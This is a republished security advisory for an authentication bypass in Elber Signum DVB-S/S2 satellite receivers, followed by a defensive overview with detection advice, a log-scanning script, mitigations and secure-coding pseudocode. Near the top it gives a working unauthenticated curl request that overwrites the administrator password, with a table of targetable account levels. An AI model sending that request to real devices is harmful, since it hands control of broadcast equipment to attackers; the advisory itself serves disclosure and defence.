Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass

Exploit Author: LiquidWorm
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: JavaScript
Published Date: 2024-05-04
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
                  1.317 Revision 602
                  1.220 Revision 1250
                  1.220 Revision 1248_1249
                  1.220 Revision 597
                  1.217 Revision 1242
                  1.214 Revision 1023
                  1.193 Revision 924
                  1.175 Revision 873
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, it’s possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.

Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
function apply_pwd(level, pwd)
{
    $.get("json_data/set_pwd", {lev:level, pass:pwd},
    function(data){
        //$.alert({title:'Operation',text:data});
        show_message(data);
    }).fail(function(error){
        show_message('Error ' + error.status, 'error');
    });
}

--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5814
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php


18.08.2023

--


$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)


Elber Signum DVB-S/S2 IRD (v1.999 and earlier) — Authentication Bypass Overview

The Elber Signum family of DVB-S/S2 IRDs (Integrated Receiver/Decoders) used in radio broadcast and distribution networks was reported to contain an authentication bypass vulnerability in several firmware revisions. The issue allows unauthenticated actors to modify account credentials through a management interface, potentially granting administrative control over the device and downstream services.

What kind of vulnerability is this?

This is an authentication bypass in the device's web/management interface where a password-management endpoint does not enforce proper access control. In short, the endpoint that handles password updates can be invoked without prior authentication checks, enabling an attacker to overwrite credentials for accounts on the device.

Why this matters

  • Compromise of administrative credentials enables full device control — configuration changes, firmware updates, service interruption, and persistent access.
  • Broadcast and transport streams handled by the IRD can be disrupted or manipulated (e.g., audio/data streams, RDS).
  • Attackers with device access may pivot into operator networks, exfiltrate sensitive configuration or monitoring data, or misuse connected services.
  • Because the flaw affects password management, it defeats one of the primary defenses for device administration.

Reported scope and affected versions

Vendor: Elber S.r.l.
Product: SIGNUM DVB‑S / S2 IRD for Radio Networks
Affected versions (examples): 1.999 (Revision 1243), 1.317 (Revision 602), 1.220 (Revisions 1250/1248_1249/597), 1.217 (1242), 1.214 (1023), 1.193 (924), 1.175 (873), 1.166 (550)
Advisory: ZSL-2024-5814 (zeroscience.mk)
Reported by: Gjoko “LiquidWorm” Krstic

Root cause (technical summary)

The underlying cause is a missing or insufficient authorization check on a password-management API endpoint. When the server-side handler for password updates fails to validate the requester's session or privileges, it becomes possible to set arbitrary passwords for accounts without authenticating as an authorized user.

Exploitability & Risk Assessment

Exploitability

  • Exploitation requires access to the device's management interface — typically via its network-accessible HTTP/HTTPS service.
  • If the management interface is exposed to a wider network (WAN or poorly segmented LAN), the prerequisite access may be trivial for attackers who can reach the device.
  • The attack is low-complexity: it leverages an unauthenticated API call to change passwords. No privilege escalation or chaining is required once the password is replaced.

Impact

  • High — an attacker able to change admin-level credentials can fully control the device and its delivered services.
  • Potential downstream impact to broadcast streams and to any integrated infrastructure (SNMP, monitoring, logging, RDS).

Detection and Indicators of Compromise (IoCs)

Monitoring and detection should focus on unusual or unexpected management-plane activity and changes to account state.

  • Unexpected password change events or account modification logs originating from non-admin source IPs.
  • New or unexpected administrative logins following an account change.
  • Configuration changes or firmware updates performed outside of normal maintenance windows.
  • Unusual network traffic to the device's management port (HTTP/HTTPS) from external or unrelated internal hosts.

Network-level detection tips

  • Log and alert on HTTP(S) requests to device management addresses outside allowed management systems (e.g., NMS, operator consoles).
  • Correlate management requests with authentication events — if a password was changed but no authorized session preceded it, raise an alert.
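
The correlation described in the detection tips above, as an added example (not part of the original advisory or any vendor code): it scans HTTP access-log lines for requests to the json_data/set_pwd endpoint, maps the lev parameter to the account names in the advisory's reference table, and flags sources outside a management allowlist. The Common Log Format input (as a proxy or sensor in front of the device might record it), the allowlist address and the sample lines are assumptions constructed for illustration.

```javascript
// Account names per "lev" value, taken from the advisory's reference table.
const LEVELS = new Map([
  ['0', 'user_pwd'], ['1', 'puser_pwd'], ['2', 'admin_pwd'], ['4', 'display_pwd'],
  ['5', 'custom_pwd'], ['6', 'snmp_read_pwd'], ['7', 'snmp_write_pwd'],
]);
// Assumption: the only host permitted to manage the IRD.
const MGMT_HOSTS = new Set(['10.20.0.5']);
// Constructed sample lines (Common Log Format), not taken from a real device.
const SAMPLE_LOG = [
  '10.20.0.5 - - [12/May/2024:09:14:02 +0000] "GET /json_data/set_pwd?lev=0&pass=EXAMPLE-A HTTP/1.1" 200 17',
  '192.0.2.44 - - [12/May/2024:23:51:40 +0000] "GET /json_data/set_pwd?lev=2&pass=EXAMPLE-B HTTP/1.1" 200 17',
  '192.0.2.44 - - [12/May/2024:23:51:41 +0000] "GET /modules/pwd.html HTTP/1.1" 200 4096',
  '198.51.100.7 - - [13/May/2024:01:02:03 +0000] "GET /json_data/set_pwd?pass=EXAMPLE-C&lev=7 HTTP/1.1" 200 17',
  'truncated or malformed line',
];
const CLF = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/;

// Return a password-change event for one log line, or null if it is not one.
function parseSetPwd(line) {
  const m = CLF.exec(line);
  if (!m) return null;
  const [, src, time, method, target, status] = m;
  let url;
  try { url = new URL(target, 'http://device.invalid'); } catch { return null; }
  if (url.pathname !== '/json_data/set_pwd') return null;
  const lev = url.searchParams.get('lev');
  return {
    src, time, method, status: Number(status),
    account: LEVELS.get(lev) || `unknown (lev=${lev})`,
    // Record only that a credential was in the URL, never its value.
    passwordInUrl: url.searchParams.has('pass'),
  };
}

// Off-allowlist sources are critical; allowlisted ones still need a matching
// change record, because the endpoint itself proves nothing about the caller.
function findAlerts(lines, allowed = MGMT_HOSTS) {
  return lines.map(parseSetPwd).filter(Boolean).map((ev) => ({
    ...ev,
    severity: allowed.has(ev.src) ? 'review' : 'critical',
  }));
}

for (const a of findAlerts(SAMPLE_LOG)) {
  console.log(`${a.severity.toUpperCase()} ${a.time} ${a.src} set ${a.account}`);
}
```

Because the password travels in the query string, the raw log lines themselves hold credentials and should be access-controlled; the alert objects deliberately omit the value.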

Mitigation and Remediation

Immediate and medium-term mitigations should be applied until an official vendor patch is available and installed.

Immediate actions (priority)

  • Isolate affected devices: restrict network access to the management interface to a trusted management VLAN or a jump-host/VPN. Block access from general LAN/WAN.
  • Restrict access via network firewall rules so only specific management hosts can reach the device.
  • Change all device passwords via a secure, authenticated channel after applying mitigations, and rotate related credentials.
  • Enable or enforce secure management protocols (HTTPS, SSH) and disable unencrypted services where possible.

Medium-term and long-term controls

  • Apply vendor firmware updates as soon as an official fix is released and verified.
  • Use management plane segregation (dedicated networks or out-of-band management) for broadcast infrastructure devices.
  • Harden device accounts: remove unused accounts, disable default or shared credentials, enforce strong password policies and two-factor authentication where supported.
  • Implement monitoring and logging for administrative operations and integrate alerts into SIEM/NOC workflows.
  • Regularly audit device firmware, configuration, and network exposure as part of your vulnerability management program.

Preventive coding guidance for vendors

For developers of embedded/management web interfaces, the following secure pattern helps prevent similar flaws:

/* Pseudocode: enforce authentication before performing sensitive operations */
function handlePasswordChange(request) {
    // Ensure a valid authenticated session and required privilege level
    const session = validateSession(request);
    if (!session || !session.hasPrivilege('admin')) {
        return errorResponse(401, "Unauthorized");
    }

    // Validate input and enforce password policy
    const newPassword = sanitize(request.body.password);
    if (!meetsPasswordPolicy(newPassword)) {
        return errorResponse(400, "Password policy violation");
    }

    // Perform change and audit
    const result = updateUserPassword(request.body.userId, newPassword);
    logAuditEvent(session.user, "password_change", request.body.userId, request.clientIp);
    return successResponse(200, "Password updated");
}

Explanation: This pseudocode demonstrates essential controls — validate the session and privileges, sanitize and validate input, perform the change only after checks, and create an audit log entry. Authentication and authorization must be enforced server-side for any action that alters credentials.

Responsible Disclosure and Vendor Coordination

Best practice for operators who discover such issues is to coordinate with the vendor (Elber S.r.l.) and follow responsible disclosure. Confirm whether a vendor patch exists, and if not, request timelines and mitigations. Maintain documentation of all communications and any compensating controls implemented.

Detection & Response Playbook (summary)

  • Identify all Signum IRDs on the network and inventory firmware revisions.
  • Restrict management access immediately (firewall/VLAN/VPN) and monitor for suspicious management traffic.
  • Rotate administrative passwords using an authenticated process after restricting access.
  • Collect device logs and review for unauthorized changes; escalate and perform forensic analysis if compromise is suspected.
  • Apply vendor-provided fixes as soon as available, then harden and monitor ongoing operations.

References and Further Reading

  • Vendor homepage: https://www.elber.it
  • Public advisory: ZSL-2024-5814 (zeroscience.mk)
  • General guidance: secure API design, authentication & authorization best practices, and network segmentation for device management